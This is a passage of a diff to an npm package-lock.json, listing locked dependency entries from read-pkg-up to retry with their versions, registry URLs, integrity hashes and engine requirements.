"sha512-zK0TB7Xd6JpCLmlLmufqykGE+/TlOePD6qKClNW7hHDKFh/J7/7gCWGR7joEQEW1bKq3a3yUZSObOoWLFQ4ohg==", + "dev": true, + "dependencies": { + "find-up": "^4.1.0", + "read-pkg": "^5.2.0", + "type-fest": "^0.8.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/read-pkg-up/node_modules/find-up": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", + "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", + "dev": true, + "dependencies": { + "locate-path": "^5.0.0", + "path-exists": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/read-pkg-up/node_modules/locate-path": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", + "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", + "dev": true, + "dependencies": { + "p-locate": "^4.1.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/read-pkg-up/node_modules/p-limit": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", + "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", + "dev": true, + "dependencies": { + "p-try": "^2.0.0" + }, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/read-pkg-up/node_modules/p-locate": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", + "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", + "dev": true, + "dependencies": { + "p-limit": "^2.2.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/read-pkg-up/node_modules/type-fest": { + "version": "0.8.1", + "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.8.1.tgz", + "integrity": "sha512-4dbzIzqvjtgiM5rw1k5rEHtBANKmdudhGyBEajN01fEyhaAIhsoKNy6y7+IN93IfpFtwY9iqi7kD+xwKhQsNJA==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/read-pkg/node_modules/type-fest": { + "version": "0.6.0", + "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.6.0.tgz", + "integrity": "sha512-q+MB8nYR1KDLrgr4G5yemftpMC7/QLqVndBmEEdqzmNj5dcFOO4Oo8qlwZE3ULT3+Zim1F8Kq4cBnikNhlCMlg==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/readable-stream": { + "version": "3.6.0", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-3.6.0.tgz", + "integrity": "sha512-BViHy7LKeTz4oNnkcLJ+lVSL6vpiFeX6/d3oSH8zCW7UxP2onchk+vTGB143xuFjHS3deTgkKoXXymXqymiIdA==", + "dependencies": { + "inherits": "^2.0.3", + "string_decoder": "^1.1.1", + "util-deprecate": "^1.0.1" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/readdir-glob": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/readdir-glob/-/readdir-glob-1.1.3.tgz", + "integrity": "sha512-v05I2k7xN8zXvPD9N+z/uhXPaj0sUFCe2rcWZIpBsqxfP7xXFQ0tipAd/wjj1YxWyWtUS5IDJpOG82JKt2EAVA==", + "dependencies": { + "minimatch": "^5.1.0" + } + }, + "node_modules/readdir-glob/node_modules/brace-expansion": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", + "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "dependencies": { + "balanced-match": "^1.0.0" + } + }, + "node_modules/readdir-glob/node_modules/minimatch": { + "version": "5.1.6", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-5.1.6.tgz", + "integrity": "sha512-lKwV/1brpG6mBUFHtb7NUmtABCb2WZZmm2wNiOA5hAb8VdCS4B3dtMWyvcoViccwAW/COERjXLt0zP1zXUN26g==", + "dependencies": { + "brace-expansion": "^2.0.1" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/readdirp": { + "version": "3.6.0", + "resolved": "https://registry.npmjs.org/readdirp/-/readdirp-3.6.0.tgz", + "integrity": "sha512-hOS089on8RduqdbhvQ5Z37A0ESjsqz6qnRcffsMU3495FuTdqSm+7bhJ29JvIOsBDEEnan5DPu9t3To9VRlMzA==", + "dev": true, + "dependencies": { + "picomatch": "^2.2.1" + }, + "engines": { + "node": ">=8.10.0" + } + }, + "node_modules/recast": { + "version": "0.23.9", + "resolved": "https://registry.npmjs.org/recast/-/recast-0.23.9.tgz", + "integrity": "sha512-Hx/BGIbwj+Des3+xy5uAtAbdCyqK9y9wbBcDFDYanLS9JnMqf7OeF87HQwUimE87OEc72mr6tkKUKMBBL+hF9Q==", + "dev": true, + "dependencies": { + "ast-types": "^0.16.1", + "esprima": "~4.0.0", + "source-map": "~0.6.1", + "tiny-invariant": "^1.3.3", + "tslib": "^2.0.1" + }, + "engines": { + "node": ">= 4" + } + }, + "node_modules/rechoir": { + "version": "0.8.0", + "resolved": "https://registry.npmjs.org/rechoir/-/rechoir-0.8.0.tgz", + "integrity": "sha512-/vxpCXddiX8NGfGO/mTafwjq4aFa/71pvamip0++IQk3zG8cbCj0fifNPrjjF1XMXUne91jL9OoxmdykoEtifQ==", + "dependencies": { + "resolve": "^1.20.0" + }, + "engines": { + "node": ">= 10.13.0" + } + }, + "node_modules/recurly": { + "version": "4.12.0", + "resolved": "https://registry.npmjs.org/recurly/-/recurly-4.12.0.tgz", + "integrity": "sha512-pmsREYXBBPYYAqeurlAAmB7sNiYfRva5Imi+nxZ41QHDZsDWuM35Q4/TSouLy8HdEE+HPfB4XHHpGNjo2LAM+A==" + }, + "node_modules/redent": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/redent/-/redent-3.0.0.tgz", + "integrity": "sha512-6tDA8g98We0zd0GvVeMT9arEOnTw9qM03L9cJXaCjrip1OO764RDBLBfrB4cwzNGDj5OA5ioymC9GkizgWJDUg==", + "dev": true, + "license": "MIT", + "dependencies": { + "indent-string": "^4.0.0", + "strip-indent": "^3.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/redent/node_modules/strip-indent": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/strip-indent/-/strip-indent-3.0.0.tgz", + "integrity": "sha512-laJTa3Jb+VQpaC6DseHhF7dXVqHTfJPCRDaEbid/drOhgitgYku/letMUqOXFoWV0zIIUbjpdH2t+tYj4bQMRQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "min-indent": "^1.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/redis": { + "version": "0.7.3", + "resolved": "https://registry.npmjs.org/redis/-/redis-0.7.3.tgz", + "integrity": "sha512-0Pgb0jOLfn6eREtEIRn/ifyZJjl2H+wUY4F/Pe7T4UhmoSrZ/1HU5ZqiBpDk8I8Wbyv2N5DpXKzbEtMj3drprg==", + "optional": true, + "engines": { + "node": "*" + } + }, + "node_modules/redis-commands": { + "version": "1.7.0", + "resolved": "https://registry.npmjs.org/redis-commands/-/redis-commands-1.7.0.tgz", + "integrity": "sha512-nJWqw3bTFy21hX/CPKHth6sfhZbdiHP6bTawSgQBlKOVRG7EZkfHbbHwQJnrE4vsQf0CMNE+3gJ4Fmm16vdVlQ==" + }, + "node_modules/redis-errors": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/redis-errors/-/redis-errors-1.2.0.tgz", + "integrity": "sha1-62LSrbFeTq9GEMBK/hUpOEJQq60=", + "engines": { + "node": ">=4" + } + }, + "node_modules/redis-parser": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/redis-parser/-/redis-parser-3.0.0.tgz", + "integrity": "sha1-tm2CjNyv5rS4pCin3vTGvKwxyLQ=", + "dependencies": { + "redis-errors": "^1.0.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/redlock": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/redlock/-/redlock-4.2.0.tgz", + "integrity": "sha512-j+oQlG+dOwcetUt2WJWttu4CZVeRzUrcVcISFmEmfyuwCVSJ93rDT7YSgg7H7rnxwoRyk/jU46kycVka5tW7jA==", + "dependencies": { + "bluebird": "^3.7.2" + }, + "engines": { + "node": ">=8.0.0" + } + }, + "node_modules/reduce": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/reduce/-/reduce-1.0.2.tgz", + "integrity": "sha512-xX7Fxke/oHO5IfZSk77lvPa/7bjMh9BuCk4OOoX5XTXrM7s0Z+MkPfSDfz0q7r91BhhGSs8gii/VEN/7zhCPpQ==", + "dev": true, + "dependencies": { + "object-keys": "^1.1.0" + } + }, + "node_modules/redux": { + "version": "4.2.1", + "resolved": "https://registry.npmjs.org/redux/-/redux-4.2.1.tgz", + "integrity": "sha512-LAUYz4lc+Do8/g7aeRa8JkyDErK6ekstQaqWQrNRW//MY1TvCEpMtpTWvlQ+FPbWCx+Xixu/6SHt5N0HR+SB4w==", + "dependencies": { + "@babel/runtime": "^7.9.2" + } + }, + "node_modules/redux-logger": { + "version": "3.0.6", + "resolved": "https://registry.npmjs.org/redux-logger/-/redux-logger-3.0.6.tgz", + "integrity": "sha512-JoCIok7bg/XpqA1JqCqXFypuqBbQzGQySrhFzewB7ThcnysTO30l4VCst86AuB9T9tuT03MAA56Jw2PNhRSNCg==", + "dependencies": { + "deep-diff": "^0.3.5" + } + }, + "node_modules/redux-mock-store": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/redux-mock-store/-/redux-mock-store-1.5.0.tgz", + "integrity": "sha512-8AN6ti8SeH28FZm/mz+E2sj2JoaFCDudswbeFrt4Rnbi4KmI/KXumbskY7caO52zAgsda+DIgKBc60MJJhnhbg==", + "deprecated": "breaking changes in minor version", + "dev": true, + "dependencies": { + "lodash.isplainobject": "^4.0.6" + }, + "peerDependencies": { + "redux": "*" + } + }, + "node_modules/redux-thunk": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/redux-thunk/-/redux-thunk-2.2.0.tgz", + "integrity": "sha512-OOFWh9mt/7i94QPq4IAxhSIUyfIJJRnk6pe1IwgXethQik3kyg1wuxVZZlW9QOmL5rP/MrwzV+Cb+/HBKlvM8Q==" + }, + "node_modules/referer-parser": { + "version": "0.0.4", + "resolved": "git+ssh://git@github.com/overleaf/nodejs-referer-parser.git#8b8b103762d05b7be4cfa2f810e1d408be67d7bb", + "integrity": "sha512-73u9iYlvAoOF3PuteH1Yl3hdIGcGefyyZbgcNcaF8gAnSrx/cHlgiht/AhbT+rcM0dv0bPo9NxBmTrR1jr8DMQ==", + "dependencies": { + "js-yaml": "^4.1.0" + } + }, + "node_modules/referrer-policy": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/referrer-policy/-/referrer-policy-1.2.0.tgz", + "integrity": "sha512-LgQJIuS6nAy1Jd88DCQRemyE3mS+ispwlqMk3b0yjZ257fI1v9c+/p6SD5gP5FGyXUIgrNOAfmyioHwZtYv2VA==", + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/reflect.getprototypeof": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/reflect.getprototypeof/-/reflect.getprototypeof-1.0.4.tgz", + "integrity": "sha512-ECkTw8TmJwW60lOTR+ZkODISW6RQ8+2CL3COqtiJKLd6MmB45hN51HprHFziKLGkAuTGQhBb91V8cy+KHlaCjw==", + "dev": true, + "dependencies": { + "call-bind": "^1.0.2", + "define-properties": "^1.2.0", + "es-abstract": "^1.22.1", + "get-intrinsic": "^1.2.1", + "globalthis": "^1.0.3", + "which-builtin-type": "^1.1.3" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/regenerate": { + "version": "1.4.2", + "resolved": "https://registry.npmjs.org/regenerate/-/regenerate-1.4.2.tgz", + "integrity": "sha512-zrceR/XhGYU/d/opr2EKO7aRHUeiBI8qjtfHqADTwZd6Szfy16la6kqD0MIUs5z5hx6AaKa+PixpPrR289+I0A==", + "dev": true + }, + "node_modules/regenerate-unicode-properties": { + "version": "10.1.0", + "resolved": "https://registry.npmjs.org/regenerate-unicode-properties/-/regenerate-unicode-properties-10.1.0.tgz", + "integrity": "sha512-d1VudCLoIGitcU/hEg2QqvyGZQmdC0Lf8BqdOMXGFSvJP4bNV1+XqbPQeHHLD51Jh4QJJ225dlIFvY4Ly6MXmQ==", + "dev": true, + "dependencies": { + "regenerate": "^1.4.2" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/regenerator-runtime": { + "version": "0.13.11", + "resolved": "https://registry.npmjs.org/regenerator-runtime/-/regenerator-runtime-0.13.11.tgz", + "integrity": "sha512-kY1AZVr2Ra+t+piVaJ4gxaFaReZVH40AKNo7UCX6W+dEwBo/2oZJzqfuN1qLq1oL45o56cPaTXELwrTh8Fpggg==" + }, + "node_modules/regenerator-transform": { + "version": "0.15.2", + "resolved": "https://registry.npmjs.org/regenerator-transform/-/regenerator-transform-0.15.2.tgz", + "integrity": "sha512-hfMp2BoF0qOk3uc5V20ALGDS2ddjQaLrdl7xrGXvAIow7qeWRM2VA2HuCHkUKk9slq3VwEwLNK3DFBqDfPGYtg==", + "dev": true, + "dependencies": { + "@babel/runtime": "^7.8.4" + } + }, + "node_modules/regex-not": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/regex-not/-/regex-not-1.0.2.tgz", + "integrity": "sha512-J6SDjUgDxQj5NusnOtdFxDwN/+HWykR8GELwctJ7mdqhcyy1xEc4SRFHUXvxTp661YaVKAjfRLZ9cCqS6tn32A==", + "dev": true, + "dependencies": { + "extend-shallow": "^3.0.2", + "safe-regex": "^1.1.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/regex-parser": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/regex-parser/-/regex-parser-2.3.0.tgz", + "integrity": "sha512-TVILVSz2jY5D47F4mA4MppkBrafEaiUWJO/TcZHEIuI13AqoZMkK1WMA4Om1YkYbTx+9Ki1/tSUXbceyr9saRg==", + "dev": true + }, + "node_modules/regexp-tree": { + "version": "0.1.27", + "resolved": "https://registry.npmjs.org/regexp-tree/-/regexp-tree-0.1.27.tgz", + "integrity": "sha512-iETxpjK6YoRWJG5o6hXLwvjYAoW+FEZn9os0PD/b6AP6xQwsa/Y7lCVgIixBbUPMfhu+i2LtdeAqVTgGlQarfA==", + "dev": true, + "bin": { + "regexp-tree": "bin/regexp-tree" + } + }, + "node_modules/regexp.prototype.flags": { + "version": "1.5.2", + "resolved": "https://registry.npmjs.org/regexp.prototype.flags/-/regexp.prototype.flags-1.5.2.tgz", + "integrity": "sha512-NcDiDkTLuPR+++OCKB0nWafEmhg/Da8aUPLPMQbK+bxKKCm1/S5he+AqYa4PlMCVBalb4/yxIRub6qkEx5yJbw==", + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.6", + "define-properties": "^1.2.1", + "es-errors": "^1.3.0", + "set-function-name": "^2.0.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/regexparam": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/regexparam/-/regexparam-3.0.0.tgz", + "integrity": "sha512-RSYAtP31mvYLkAHrOlh25pCNQ5hWnT106VukGaaFfuJrZFkGRX5GhUAdPqpSDXxOhA2c4akmRuplv1mRqnBn6Q==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=8" + } + }, + "node_modules/regexpp": { + "version": "3.2.0", + "resolved": "https://registry.npmjs.org/regexpp/-/regexpp-3.2.0.tgz", + "integrity": "sha512-pq2bWo9mVD43nbts2wGv17XLiNLya+GklZ8kaDLV2Z08gDCsGpnKn9BFMepvWuHCbyVvY7J5o5+BVvoQbmlJLg==", + "dev": true, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/mysticatea" + } + }, + "node_modules/regexpu-core": { + "version": "5.3.2", + "resolved": "https://registry.npmjs.org/regexpu-core/-/regexpu-core-5.3.2.tgz", + "integrity": "sha512-RAM5FlZz+Lhmo7db9L298p2vHP5ZywrVXmVXpmAD9GuL5MPH6t9ROw1iA/wfHkQ76Qe7AaPF0nGuim96/IrQMQ==", + "dev": true, + "dependencies": { + "@babel/regjsgen": "^0.8.0", + "regenerate": "^1.4.2", + "regenerate-unicode-properties": "^10.1.0", + "regjsparser": "^0.9.1", + "unicode-match-property-ecmascript": "^2.0.0", + "unicode-match-property-value-ecmascript": "^2.1.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/regjsparser": { + "version": "0.9.1", + "resolved": "https://registry.npmjs.org/regjsparser/-/regjsparser-0.9.1.tgz", + "integrity": "sha512-dQUtn90WanSNl+7mQKcXAgZxvUe7Z0SqXlgzv0za4LwiUhyzBC58yQO3liFoUgu8GiJVInAhJjkj1N0EtQ5nkQ==", + "dev": true, + "dependencies": { + "jsesc": "~0.5.0" + }, + "bin": { + "regjsparser": "bin/parser" + } + }, + "node_modules/regjsparser/node_modules/jsesc": { + "version": "0.5.0", + "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-0.5.0.tgz", + "integrity": "sha512-uZz5UnB7u4T9LvwmFqXii7pZSouaRPorGs5who1Ip7VO0wxanFvBL7GkM6dTHlgX+jhBApRetaWpnDabOeTcnA==", + "dev": true, + "bin": { + "jsesc": "bin/jsesc" + } + }, + "node_modules/relateurl": { + "version": "0.2.7", + "resolved": "https://registry.npmjs.org/relateurl/-/relateurl-0.2.7.tgz", + "integrity": "sha1-VNvzd+UUQKypCkzSdGANP/LYiKk=", + "dev": true, + "engines": { + "node": ">= 0.10" + } + }, + "node_modules/remove-accents": { + "version": "0.4.2", + "resolved": "https://registry.npmjs.org/remove-accents/-/remove-accents-0.4.2.tgz", + "integrity": "sha1-CkPTqq4egNuRngeuJUsoXZ4ce7U=", + "dev": true + }, + "node_modules/remove-trailing-separator": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/remove-trailing-separator/-/remove-trailing-separator-1.1.0.tgz", + "integrity": "sha512-/hS+Y0u3aOfIETiaiirUFwDBDzmXPvO+jAfKTitUngIPzdKc6Z0LoFjM/CK5PL4C+eKwHohlHAb6H0VFfmmUsw==", + "dev": true + }, + "node_modules/renderkid": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/renderkid/-/renderkid-3.0.0.tgz", + "integrity": "sha512-q/7VIQA8lmM1hF+jn+sFSPWGlMkSAeNYcPLmDQx2zzuiDfaLrOmumR8iaUKlenFgh0XRPIUeSPlH3A+AW3Z5pg==", + "dev": true, + "dependencies": { + "css-select": "^4.1.3", + "dom-converter": "^0.2.0", + "htmlparser2": "^6.1.0", + "lodash": "^4.17.21", + "strip-ansi": "^6.0.1" + } + }, + "node_modules/repeat-element": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/repeat-element/-/repeat-element-1.1.4.tgz", + "integrity": "sha512-LFiNfRcSu7KK3evMyYOuCzv3L10TW7yC1G2/+StMjK8Y6Vqd2MG7r/Qjw4ghtuCOjFvlnms/iMmLqpvW/ES/WQ==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/repeat-string": { + "version": "1.6.1", + "resolved": "https://registry.npmjs.org/repeat-string/-/repeat-string-1.6.1.tgz", + "integrity": "sha512-PV0dzCYDNfRi1jCDbJzpW7jNNDRuCOG/jI5ctQcGKt/clZD+YcPS3yIlWuTJMmESC8aevCFmWJy5wjAFgNqN6w==", + "dev": true, + "engines": { + "node": ">=0.10" + } + }, + "node_modules/replace-ext": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/replace-ext/-/replace-ext-2.0.0.tgz", + "integrity": "sha512-UszKE5KVK6JvyD92nzMn9cDapSk6w/CaFZ96CnmDMUqH9oowfxF/ZjRITD25H4DnOQClLA4/j7jLGXXLVKxAug==", + "dev": true, + "engines": { + "node": ">= 10" + } + }, + "node_modules/request": { + "version": "2.88.2", + "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", + "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", + "deprecated": "request has been deprecated, see https://github.com/request/request/issues/3142", + "dependencies": { + "aws-sign2": "~0.7.0", + "aws4": "^1.8.0", + "caseless": "~0.12.0", + "combined-stream": "~1.0.6", + "extend": "~3.0.2", + "forever-agent": "~0.6.1", + "form-data": "~2.3.2", + "har-validator": "~5.1.3", + "http-signature": "~1.2.0", + "is-typedarray": "~1.0.0", + "isstream": "~0.1.2", + "json-stringify-safe": "~5.0.1", + "mime-types": "~2.1.19", + "oauth-sign": "~0.9.0", + "performance-now": "^2.1.0", + "qs": "~6.5.2", + "safe-buffer": "^5.1.2", + "tough-cookie": "~2.5.0", + "tunnel-agent": "^0.6.0", + "uuid": "^3.3.2" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/request-progress": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/request-progress/-/request-progress-3.0.0.tgz", + "integrity": "sha1-TKdUCBx/7GP1BeT6qCWqBs1mnb4=", + "dev": true, + "dependencies": { + "throttleit": "^1.0.0" + } + }, + "node_modules/request/node_modules/form-data": { + "version": "2.3.3", + "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", + "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", + "dependencies": { + "asynckit": "^0.4.0", + "combined-stream": "^1.0.6", + "mime-types": "^2.1.12" + }, + "engines": { + "node": ">= 0.12" + } + }, + "node_modules/request/node_modules/qs": { + "version": "6.5.3", + "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", + "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", + "engines": { + "node": ">=0.6" + } + }, + "node_modules/request/node_modules/tough-cookie": { + "version": "2.5.0", + "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", + "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", + "dependencies": { + "psl": "^1.1.28", + "punycode": "^2.1.1" + }, + "engines": { + "node": ">=0.8" + } + }, + "node_modules/requestretry": { + "version": "7.1.0", + "resolved": "https://registry.npmjs.org/requestretry/-/requestretry-7.1.0.tgz", + "integrity": "sha512-TqVDgp251BW4b8ddQ2ptaj/57Z3LZHLscAUT7v6qs70buqF2/IoOVjYbpjJ6HiW7j5+waqegGI8xKJ/+uzgDmw==", + "dependencies": { + "extend": "^3.0.2", + "lodash": "^4.17.15" + }, + "peerDependencies": { + "request": "2.*.*" + } + }, + "node_modules/require-directory": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", + "integrity": "sha1-jGStX9MNqxyXbiNE/+f3kqam30I=", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/require-from-string": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/require-from-string/-/require-from-string-2.0.2.tgz", + "integrity": "sha512-Xf0nWe6RseziFMu+Ap9biiUbmplq6S9/p+7w7YXP/JBHhrUDDUhwa+vANyubuqfZWTveU//DYVGsDG7RKL/vEw==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/require-like": { + "version": "0.1.2", + "resolved": "https://registry.npmjs.org/require-like/-/require-like-0.1.2.tgz", + "integrity": "sha1-rW8wwTvs15cBDEaK+ndcDAprR/o=", + "dev": true, + "engines": { + "node": "*" + } + }, + "node_modules/require-main-filename": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/require-main-filename/-/require-main-filename-2.0.0.tgz", + "integrity": "sha512-NKN5kMDylKuldxYLSUfrbo5Tuzh4hd+2E8NPPX02mZtn1VuREQToYe/ZdlJy+J3uCpfaiGF05e7B8W0iXbQHmg==", + "dev": true + }, + "node_modules/requires-port": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/requires-port/-/requires-port-1.0.0.tgz", + "integrity": "sha1-kl0mAdOaxIXgkc8NpcbmlNw9yv8=" + }, + "node_modules/requizzle": { + "version": "0.2.4", + "resolved": "https://registry.npmjs.org/requizzle/-/requizzle-0.2.4.tgz", + "integrity": "sha512-JRrFk1D4OQ4SqovXOgdav+K8EAhSB/LJZqCz8tbX0KObcdeM15Ss59ozWMBWmmINMagCwmqn4ZNryUGpBsl6Jw==", + "dependencies": { + "lodash": "^4.17.21" + } + }, + "node_modules/reselect": { + "version": "4.1.8", + "resolved": "https://registry.npmjs.org/reselect/-/reselect-4.1.8.tgz", + "integrity": "sha512-ab9EmR80F/zQTMNeneUr4cv+jSwPJgIlvEmVwLerwrWVbpLlBuls9XHzIeTFy4cegU2NHBp3va0LKOzU5qFEYQ==", + "dev": true + }, + "node_modules/resolve": { + "version": "1.22.8", + "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", + "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", + "dependencies": { + "is-core-module": "^2.13.0", + "path-parse": "^1.0.7", + "supports-preserve-symlinks-flag": "^1.0.0" + }, + "bin": { + "resolve": "bin/resolve" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/resolve-cwd": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", + "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", + "dev": true, + "dependencies": { + "resolve-from": "^5.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/resolve-from": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", + "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", + "engines": { + "node": ">=8" + } + }, + "node_modules/resolve-options": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/resolve-options/-/resolve-options-2.0.0.tgz", + "integrity": "sha512-/FopbmmFOQCfsCx77BRFdKOniglTiHumLgwvd6IDPihy1GKkadZbgQJBcTb2lMzSR1pndzd96b1nZrreZ7+9/A==", + "dev": true, + "dependencies": { + "value-or-function": "^4.0.0" + }, + "engines": { + "node": ">= 10.13.0" + } + }, + "node_modules/resolve-url": { + "version": "0.2.1", + "resolved": "https://registry.npmjs.org/resolve-url/-/resolve-url-0.2.1.tgz", + "integrity": "sha512-ZuF55hVUQaaczgOIwqWzkEcEidmlD/xl44x1UZnhOXcYuFN2S6+rcxpG+C1N3So0wvNI3DmJICUFfu2SxhBmvg==", + "deprecated": "https://github.com/lydell/resolve-url#deprecated", + "dev": true + }, + "node_modules/resolve-url-loader": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/resolve-url-loader/-/resolve-url-loader-5.0.0.tgz", + "integrity": "sha512-uZtduh8/8srhBoMx//5bwqjQ+rfYOUq8zC9NrMUGtjBiGTtFJM42s58/36+hTqeqINcnYe08Nj3LkK9lW4N8Xg==", + "dev": true, + "dependencies": { + "adjust-sourcemap-loader": "^4.0.0", + "convert-source-map": "^1.7.0", + "loader-utils": "^2.0.0", + "postcss": "^8.2.14", + "source-map": "0.6.1" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/restore-cursor": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/restore-cursor/-/restore-cursor-3.1.0.tgz", + "integrity": "sha512-l+sSefzHpj5qimhFSE5a8nufZYAM3sBSVMAPtYkmC+4EH2anSGaEMXSD0izRQbu9nfyQ9y5JrVmp7E8oZrUjvA==", + "dev": true, + "dependencies": { + "onetime": "^5.1.0", + "signal-exit": "^3.0.2" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/ret": { + "version": "0.1.15", + "resolved": "https://registry.npmjs.org/ret/-/ret-0.1.15.tgz", + "integrity": "sha512-TTlYpa+OL+vMMNG24xSlQGEJ3B/RzEfUlLct7b5G/ytav+wPrplCpVMFuwzXbkecJrb6IYo1iFb0S9v37754mg==", + "dev": true, + "engines": { + "node": ">=0.12" + } + }, + "node_modules/retry": { + "version": "0.13.1", + "resolved": "https://registry.npmjs.org/retry/-/retry-0.13.1.tgz", + "integrity": 